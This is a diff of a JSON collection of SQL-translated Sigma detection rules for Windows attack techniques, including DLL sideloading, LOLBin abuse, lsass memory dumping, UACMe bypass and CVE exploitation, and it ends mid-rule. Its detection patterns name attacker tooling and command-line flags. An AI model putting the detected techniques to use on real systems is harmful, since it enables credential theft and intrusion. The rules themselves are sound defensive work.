+ "id": "7c8af9b2-dcae-41a2-a9db-b28c288b5f08", "status": "experimental", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects usage of \"appcmd\" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate usage of appcmd to add new URL rewrite rules" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Description = 'System.Management.Automation' AND ImageLoaded LIKE '%System.Management.Automation%' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Citrix\\\\ConfigSync\\\\%' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (NewProcessName = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:system.webServer/rewrite/globalRules%' ESCAPE '\\' AND CommandLine LIKE '%commit:%' ESCAPE '\\'))" ], - "filename": "image_load_alternate_powershell_hosts_moduleload.yml" + "filename": "proc_creation_win_iis_appcmd_susp_rewrite_rule.yml" }, { - "title": "Microsoft Defender Loading DLL from Nondefault Path", - "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", + "title": "REGISTER_APP.VBS Proxy Execution", + "id": "1c8774a0-44d4-4db0-91f8-e792359c70bd", "status": "experimental", - "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1218" ], "falsepositives": [ - "Very unlikely" + "Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\register\\_app.vbs%' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\')" ], - "filename": "image_load_side_load_windows_defender.yml" + "filename": "proc_creation_win_lolbin_register_app.yml" }, { - "title": "Time Travel Debugging Utility Usage - Image", - "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", - "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "DeviceCredentialDeployment Execution", + "id": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", + "status": "experimental", + "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Unlikely" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\DeviceCredentialDeployment.exe' ESCAPE '\\')" ], - "filename": "image_load_tttracer_mod_load.yml" + "filename": "proc_creation_win_lolbin_device_credential_deployment.yml" }, { - "title": "Active Directory Kerberos DLL Loaded Via Office Applications", - "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", + "title": "Renamed Whoami Execution", + "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", "status": "test", - "description": "Detects Kerberos DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'whoami.exe' AND NOT (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "image_load_office_kerberos_dll_load.yml" + "filename": "proc_creation_win_renamed_whoami.yml" }, { - "title": "Web Browsers DLL Sideloading", - "id": "72ca7c75-bf85-45cd-aca7-255d360e423c", + "title": "CreateDump Process Dump", + "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of web browsers", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Command lines that use the same flags" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\chrome\\_frame\\_helper.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" ], - "filename": "image_load_side_load_web_browsers.yml" + "filename": "proc_creation_win_createdump_lolbin_execution.yml" }, { - "title": "DLL Sideloading Of DBGCORE.DLL", - "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", - "status": "experimental", - "description": "Detects DLL sideloading of \"dbgcore.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "HackTool - XORDump Execution", + "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", + "status": "test", + "description": "Detects suspicious use of XORDump process memory dumping utility", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Another tool that uses the command line switches of XORdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" ], - "filename": "image_load_side_load_dbgcore_dll.yml" + "filename": "proc_creation_win_hktl_xordump.yml" }, { - "title": "Active Directory Parsing DLL Loaded Via Office Applications", - "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", - "status": "test", - "description": "Detects DSParse DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Service Reconnaissance Via Wmic.EXE", + "id": "76f55eaa-d27f-4213-9d45-7b0e4b60bbae", + "status": "experimental", + "description": "An adversary might use WMI to check if a certain remote service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1204.002" + "attack.t1047" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%service%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_wmic_recon_service.yml" + }, + { + "title": "Indirect Command Execution By Program Compatibility Wizard", + "id": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", + "status": "test", + "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe", + "author": "A. Sungurov , oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts", + "Legit usage of scripts" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\')" ], - "filename": "image_load_office_dsparse_dll_load.yml" + "filename": "proc_creation_win_lolbin_pcwrun.yml" }, { - "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", - "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", + "title": "Change Default File Association Via Assoc", + "id": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", "status": "test", - "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects file association changes using the builtin \"assoc\" command.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.persistence", + "attack.t1546.001" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Admin activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%assoc%' ESCAPE '\\')" ], - "filename": "image_load_office_outlook_outlvba_load.yml" + "filename": "proc_creation_win_cmd_assoc_execution.yml" }, { - "title": "System Drawing DLL Load", - "id": "666ecfc7-229d-42b8-821e-1a8f8cb7057c", - "status": "experimental", - "description": "Detects processes loading \"System.Drawing.ni.dll\". This could be an indicator of potential Screen Capture.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential CVE-2021-40444 Exploitation Attempt", + "id": "894397c6-da03-425c-a589-3d09e7d1f750", + "status": "test", + "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", + "author": "Florian Roth (Nextron Systems), @neonprimetime", "tags": [ - "attack.collection", - "attack.t1113" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "False positives are very common from system and third party applications, activity needs to be investigated. This rule is best correlated with other events to increase the level of suspiciousness" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\System.Drawing.ni.dll' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" ], - "filename": "image_load_dll_system_drawing_load.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444.yml" }, { - "title": "CLR DLL Loaded Via Office Applications", - "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", - "status": "test", - "description": "Detects CLR DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Suspicious Diantz Download and Compress Into a CAB File", + "id": "185d7418-f250-42d0-b72e-0c8b70661e93", + "status": "experimental", + "description": "Download and compress a remote file and store it in a cab file on local machine.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\')" ], - "filename": "image_load_office_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml" }, { - "title": "GAC DLL Loaded Via Office Applications", - "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "title": "Exploited CVE-2020-10189 Zoho ManageEngine", + "id": "846b866e-2a57-46ee-8e16-85fa92759be7", "status": "test", - "description": "Detects any GAC DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.initial_access", + "attack.t1190", "attack.execution", - "attack.t1204.002" + "attack.t1059.001", + "attack.t1059.003", + "attack.s0190", + "cve.2020.10189" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_office_dotnet_gac_dll_load.yml" + "filename": "proc_creation_win_exploit_cve_2020_10189.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", - "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", + "title": "Potential Configuration And Service Reconnaissance Via Reg.EXE", + "id": "970007b7-ce32-49d0-a4a4-fbef016950bd", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.discovery", + "attack.t1012", + "attack.t1007" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%query%' ESCAPE '\\' AND (CommandLine LIKE '%currentVersion\\\\windows%' ESCAPE '\\' OR CommandLine LIKE '%winlogon\\\\%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\shellServiceObjectDelayLoad%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\policies\\\\explorer\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentcontrolset\\\\services%' ESCAPE '\\'))" ], - "filename": "image_load_dcom_iertutil_dll_hijack.yml" + "filename": "proc_creation_win_reg_query_registry.yml" }, { - "title": "UAC Bypass With Fake DLL", - "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", - "status": "test", - "description": "Attempts to load dismcore.dll after dropping it", - "author": "oscd.community, Dmitry Uchakin", + "title": "HackTool - UACMe Akagi Execution", + "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "status": "experimental", + "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1574.002" + "attack.t1548.002" ], "falsepositives": [ - "Actions of a legitimate telnet client" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (NewProcessName LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" ], - "filename": "image_load_uac_bypass_via_dism.yml" + "filename": "proc_creation_win_hktl_uacme.yml" }, { - "title": "Potential DLL Sideloading Via JsSchHlp", - "id": "68654bf0-4412-43d5-bfe8-5eaa393cd939", + "title": "Ruby Inline Command Execution", + "id": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", "status": "experimental", - "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", - "author": "frack113", + "description": "Detects execution of ruby using the \"-e\" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\JSESPR.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\Justsystem\\\\JsSchHlp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ruby.exe' ESCAPE '\\' OR OriginalFileName = 'ruby.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" ], - "filename": "image_load_side_load_jsschhlp.yml" + "filename": "proc_creation_win_ruby_inline_command_execution.yml" }, { - "title": "Fax Service DLL Search Order Hijack", - "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", - "status": "test", - "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", - "author": "NVISO", + "title": "Suspicious Schtasks Schedule Type With High Privileges", + "id": "7a02e22e-b885-4404-b38b-1ddc7e65258a", + "status": "experimental", + "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Some installers were seen using this method of creation unfortunately. Filter them in your environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\') AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_ualapi.yml" + "filename": "proc_creation_win_schtasks_schedule_type_system.yml" }, { - "title": "Microsoft Office DLL Sideload", - "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", + "title": "Modify Group Policy Settings", + "id": "ada4b0c4-758b-46ac-9033-9004613a150d", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.persistence", "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1484.001" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE 